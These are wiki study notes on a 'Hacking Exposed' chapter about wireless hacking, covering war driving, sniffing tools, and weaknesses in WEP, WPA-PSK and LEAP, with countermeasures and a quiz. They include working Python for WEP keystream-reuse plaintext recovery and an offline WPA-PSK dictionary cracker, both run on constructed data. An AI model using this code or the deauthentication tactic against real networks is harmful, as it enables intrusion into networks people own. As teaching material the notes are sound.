Wireless Hacking

War Driving

War driving can be done on foot with a laptop, or from a car, and involves listening for the beacons access points transmit (passive detection) as well as transmitting your own probe requests to elicit probe responses (active detection). The antenna type and signal strength you need depend on the job, and choosing the right card can make all the difference.

Cards

Cards are chosen for an external antenna connector, a chipset whose driver supports monitor mode (and, for active attacks, packet injection), and compatibility with the OS in use. Older Unix systems may require the kernel to be rebuilt or a driver patched before a given card works. Windows is the easiest to set up but the least useful for hacking, because most Windows drivers do not expose raw 802.11 frames. Linux is the best supported OS for attack tools, drivers, and sniffers.

Antennae

Directional antennae focus power into a narrow beam, trading coverage for range. Multidirectional antennae spread power across a few sectors, so each sector reaches less far. Omnidirectional antennae radiate in every direction and are the most effective for driving, where you do not know where the APs are. The two properties to choose on are focus (wide or narrow beam) and gain (high or low): gain is the energy concentrated in the direction the antenna is focused, so high gain and narrow focus go together. HyperLinkTech is known for high-power, long-range antennae.

GPS

A GPS receiver records the coordinates at which each network was detected, so the war-driving log can be plotted on a map later. It is the wireless equivalent of a network mapping tool.

War-Driving Software

NetStumbler is a Windows-based war-driving tool that actively sends broadcast probe requests and, with a GPS receiver attached, marks the relative location of each wireless network it detects. Simple countermeasure: disable the 802.11 feature that responds to broadcast probe requests (probe requests carrying an empty SSID), which blinds NetStumbler entirely. Kismet is a Linux and BSD based wireless sniffer that detects networks passively from the beacons and data frames already in the air, and in addition gathers information about a wireless network such as IP addressing and Cisco Discovery Protocol (CDP) names. Because Kismet never transmits, disabling broadcast probe responses does nothing against it; suppressing the SSID in beacons only hides the name until a client associates, at which point the SSID appears in probe responses and association frames and Kismet records it. It is the best war-driving tool available and has few effective countermeasures.

Wireless Mapping Tools

Stumbverter uses MapPoint 2002 to plot data from files in the NetStumbler format. GPSMap comes with Kismet and does a similar task. JiGLE is a Java client for viewing data from the Wireless Geographic Logging Engine (WiGLE). WiGLE is a huge database of wireless networks that, together with its clients JiGLE and DiGLE, provides a great deal of information about various APs.

Scanning and Enumeration

Wireless sniffing requires putting the wireless card into monitor (RFMON) mode, not merely promiscuous mode. Promiscuous mode on a wireless interface still only yields Ethernet-framed traffic from the network the card is associated with, while monitor mode delivers raw 802.11 frames, including management frames such as beacons and probe responses, from every network in range. A variety of monitoring tools then decode those frames.

Wireless Monitoring Tools

tcpdump can be used as a UNIX network monitoring tool and decodes 802.11 frame information. Wireshark captures and decodes 802.11 packets using libpcap on UNIX systems and captures directly on Windows. Airfart, a Linux tool with a GTK interface, displays an AP's MAC address, SSID, manufacturer, signal strength, whether it is active, and the number of packets received.
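The passive detection Kismet does and the 802.11 frame decoding these tools perform both come down to parsing management frames. The following is an added example written for these notes (it is not Kismet's, Airfart's, or Wireshark's code): it constructs a few beacon and probe-response frames in memory, parses the BSSID, SSID and channel out of them, and shows how an AP that suppresses its SSID in beacons still reveals it in a probe response. The frames and BSSIDs are constructed test data, not a real capture, and the layout omits the radiotap header and FCS a real capture would carry.

```python
import struct

# 802.11 management subtypes and information-element tags used below
PROBE_RESPONSE, BEACON = 5, 8
SSID_IE, DS_PARAM_IE = 0, 3


def build_mgmt_frame(subtype, bssid, ssid, channel, seq=0):
    """Build a minimal beacon or probe-response frame (no radiotap header, no FCS).
    Constructed test data for this example, not a real capture."""
    frame_control = struct.pack("<H", subtype << 4)        # type 0 (management), no flags
    header = (frame_control + b"\x00\x00"                   # duration
              + b"\xff" * 6                                 # addr1: broadcast destination
              + bssid + bssid                               # addr2: source, addr3: BSSID
              + struct.pack("<H", seq << 4))                # sequence control
    fixed = struct.pack("<QHH", 0, 100, 0x0411)             # timestamp, beacon interval, capabilities
    ies = bytes([SSID_IE, len(ssid)]) + ssid + bytes([DS_PARAM_IE, 1, channel])
    return header + fixed + ies


def parse_mgmt_frame(frame):
    """Decode BSSID, SSID and channel from a beacon or probe response; None for other frames."""
    if len(frame) < 36:
        return None
    fc, = struct.unpack_from("<H", frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype not in (BEACON, PROBE_RESPONSE):
        return None
    info = {"bssid": frame[16:22].hex(":"), "subtype": subtype, "ssid": None, "channel": None}
    ies, off = frame[36:], 0                                # 24-byte header + 12 bytes of fixed fields
    while off + 2 <= len(ies):
        tag, length = ies[off], ies[off + 1]
        body = ies[off + 2:off + 2 + length]
        if len(body) < length:
            break                                           # truncated IE: stop, do not over-read
        if tag == SSID_IE:
            # "Hidden" SSID: zero length or all NULs. Record it as unknown rather than as "".
            hidden = length == 0 or body == b"\x00" * length
            info["ssid"] = None if hidden else body.decode("utf-8", "replace")
        elif tag == DS_PARAM_IE and length == 1:
            info["channel"] = body[0]
        off += 2 + length
    return info


def track_networks(frames):
    """Passive detection over a frame stream. Beacons give BSSID and channel even when the
    SSID is suppressed; the SSID then shows up in probe responses to associating clients."""
    seen = {}
    for frame in frames:
        info = parse_mgmt_frame(frame)
        if info is None:
            continue
        entry = seen.setdefault(info["bssid"], {"ssid": None, "channel": None, "hidden": False})
        if info["subtype"] == BEACON and info["ssid"] is None:
            entry["hidden"] = True
        if info["ssid"] is not None:
            entry["ssid"] = info["ssid"]
        if info["channel"] is not None:
            entry["channel"] = info["channel"]
    return seen


if __name__ == "__main__":
    ap, hidden_ap = bytes.fromhex("00112233aabb"), bytes.fromhex("00112233ccdd")  # constructed BSSIDs
    capture = [build_mgmt_frame(BEACON, ap, b"CorpNet", 6),
               build_mgmt_frame(BEACON, hidden_ap, b"", 11),
               build_mgmt_frame(PROBE_RESPONSE, hidden_ap, b"Hidden", 11)]
    for bssid, entry in track_networks(capture).items():
        print(bssid, entry)
```

The "hidden" flag is the point of the exercise: the second AP never puts its name in a beacon, but the parser still learns its BSSID and channel from the beacon and its SSID from the probe response, which is exactly why SSID hiding is not a countermeasure against a passive sniffer.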

Countermeasures

MAC address filtering and SSID hiding are ultimately defeated by the tactics above: both MAC addresses and SSIDs travel in the clear, so an attacker clones a permitted client's MAC or simply waits for a client to associate. The only countermeasure that holds up is strong encryption with strong authentication.

Encryption

Wired Equivalent Privacy (WEP) was meant to protect data from passive or accidental eavesdropping. It is often described as only as strong as its key, but the weakness is structural: WEP encrypts each packet with RC4 keyed by a 24-bit IV prepended to the static shared key, so IVs repeat quickly (reusing keystream) and certain weak IVs leak key bytes, and the key is recoverable from enough captured traffic no matter how well it was chosen. AirSnort passively collects packets and recovers the WEP key from weak-IV frames. DWEPCrack (part of BSD-airtools) recovers the key by weak-IV analysis and brute force. WEPAttack runs a dictionary attack against WEP keys using John the Ripper wordlists. Crafty key selection, the countermeasure the book offers, only blunts the dictionary attack; the real countermeasure is to replace WEP with WPA.
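To see why WEP's weakness is independent of the key, the following added example (written for these notes, not code from the book or from AirSnort, DWEPCrack or WEPAttack) implements WEP's RC4 construction and then recovers a plaintext purely from two packets that reused an IV, without ever learning the key. The shared key, IV and packet contents are constructed test data; the CRC-32 ICV is left out because it adds nothing to integrity.

```python
import math


def rc4_keystream(key, length):
    """RC4 key scheduling plus PRGA; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(shared_key, iv, plaintext):
    """WEP per-packet key is the 24-bit IV followed by the static shared key; the IV goes
    on the wire in the clear ahead of the ciphertext. (ICV omitted; it is a linear CRC.)"""
    assert len(iv) == 3
    keystream = rc4_keystream(iv + shared_key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, keystream))


def recover_plaintext_from_iv_reuse(packet1, packet2, known_plaintext1):
    """Two packets with the same IV were encrypted with the same keystream, so
    c1 XOR c2 == p1 XOR p2. With p1 known (say, a predictable header), p2 follows.
    The shared key is never needed."""
    assert packet1[:3] == packet2[:3], "IVs differ: no keystream reuse"
    c1, c2 = packet1[3:], packet2[3:]
    return bytes(a ^ b ^ p for a, b, p in zip(c1, c2, known_plaintext1))


def packets_until_iv_collision(probability=0.5, iv_bits=24):
    """Birthday bound: packets with random IVs needed before some IV repeats with the
    given probability. About 4,823 for a 50% chance, a few seconds of traffic on a busy AP."""
    n = 2 ** iv_bits
    return math.sqrt(2 * n * math.log(1 / (1 - probability)))


if __name__ == "__main__":
    shared_key = bytes.fromhex("0123456789")           # constructed 40-bit WEP key
    iv = b"\x01\x02\x03"
    known = b"AAAAAAAAAAAAAAAA"                         # attacker knows this packet's contents
    secret = b"attack at dawn!!"                        # attacker wants this one
    pkt1 = wep_encrypt(shared_key, iv, known)
    pkt2 = wep_encrypt(shared_key, iv, secret)          # same IV: same keystream
    print(recover_plaintext_from_iv_reuse(pkt1, pkt2, known))
    print("packets for a 50% IV collision:", round(packets_until_iv_collision()))
```

Known plaintext is easy to come by on a wireless LAN (ARP requests, DHCP, LLC/SNAP headers), which is why keystream reuse is practical; the weak-IV statistical attacks that AirSnort and DWEPCrack implement go one step further and recover the key itself.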

WPA

Designed to address the flaws of WEP, WPA in pre-shared-key mode derives a 256-bit pairwise master key (PMK) from the passphrase and SSID, derives fresh per-session unicast keys and a group (global) key from it during the four-way handshake, and adds a message integrity code (MIC) and a per-packet sequence counter to prevent forgery and replay. Because the passphrase-to-key derivation is public, Aircrack-ng can capture one four-way handshake and run an offline dictionary attack against a foolishly chosen passphrase. A long, random PSK defeats the dictionary attack. It does not prevent DoS: deauthentication frames are not authenticated in WPA/WPA2, and sending them is in fact how an attacker forces a client to re-handshake so the handshake can be captured.
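The offline attack above is mechanical once the handshake is in hand. This added example (written for these notes; it is not Aircrack-ng's code) implements the WPA/WPA2-PSK derivation chain, PBKDF2 from passphrase and SSID to PMK, the 802.11i PRF from PMK and nonces to the PTK, and the HMAC-SHA1 MIC over the EAPOL-Key message, and runs a wordlist against a handshake. The handshake itself is simulated in the block with the same derivation the client uses, so the attack can be checked end to end; the MAC addresses, nonces, wordlist and EAPOL payload bytes are constructed placeholders, not a real capture.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase, ssid):
    """802.11i: PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    The 4096 iterations are the only thing slowing a dictionary attack down."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """802.11i PRF-512: concatenated HMAC-SHA1(K, label || 0x00 || data || i), truncated to 64 bytes."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """PTK from PMK, both MACs and both nonces; everything but the PMK is sent in the clear."""
    data = min(ap_mac, client_mac) + max(ap_mac, client_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame_mic_zeroed):
    """WPA2 (AES key descriptor): MIC = HMAC-SHA1(KCK, EAPOL-Key frame with MIC field zeroed)[:16].
    KCK is the first 16 bytes of the PTK."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, ssid, ap_mac, client_mac, anonce, snonce, eapol_mic_zeroed, captured_mic):
    """Offline dictionary attack: derive a candidate KCK, recompute the MIC, compare to the capture."""
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_passphrase(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed), captured_mic):
            return candidate
    return None


def simulate_handshake_message2(passphrase, ssid, ap_mac, client_mac, anonce, snonce):
    """Stand-in for what the client sends in message 2 of the four-way handshake.
    Constructed: the EAPOL body below is placeholder bytes, not a real frame layout."""
    eapol_mic_zeroed = b"\x02\x03\x00\x5f" + b"\x02\x01\x0a" + b"\x00" * 8 + snonce + b"\x00" * 16
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return eapol_mic_zeroed, eapol_mic(kck, eapol_mic_zeroed)


if __name__ == "__main__":
    ap_mac, client_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # constructed
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                           # constructed
    eapol, mic = simulate_handshake_message2("correct horse", "CorpNet", ap_mac, client_mac, anonce, snonce)
    wordlist = ["password", "letmein", "correct horse", "qwerty"]                     # constructed
    print("recovered:", crack_psk(wordlist, "CorpNet", ap_mac, client_mac, anonce, snonce, eapol, mic))
```

Each candidate costs 4096 HMAC-SHA1 iterations plus a PRF, and the SSID is the PBKDF2 salt, so precomputed tables only help against common SSIDs. Nothing in the chain is secret except the passphrase, which is why the entire security of WPA-PSK reduces to the passphrase resisting a dictionary.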

Cisco's LEAP

Cisco's LEAP (Lightweight EAP) is a proprietary EAP type that provides mutual authentication and per-session WEP keys. Its authentication is an MS-CHAP-style challenge/response built on the user's password hash, so a captured exchange can be attacked offline. Anwrap is a dictionary-attack wrapper aimed at weak passwords on LEAP-enabled Cisco devices, and Asleap captures the LEAP challenge/response from the air and recovers weak passwords by dictionary attack. Strong passwords are the countermeasure the book gives for both tools; migrating to a stronger EAP method removes the exposure altogether.

Quiz

1. What are 2 tools that use GPS data to map APs? (Stumbverter, JiGLE, GPSMap)

2. What OS provides the most options for wireless hacking? (Linux)

3. What is one tool that attacks WEP? (AirSnort, DWEPCrack, WEPAttack)

4. What is one of the features of WPA that attempts to address WEP's flaws? (256-bit PSK, unicast or global encryption keys, message integrity code)


HackingExposedChapter08 (last edited 2010-04-26 12:18:56 by host-216-229-236-6)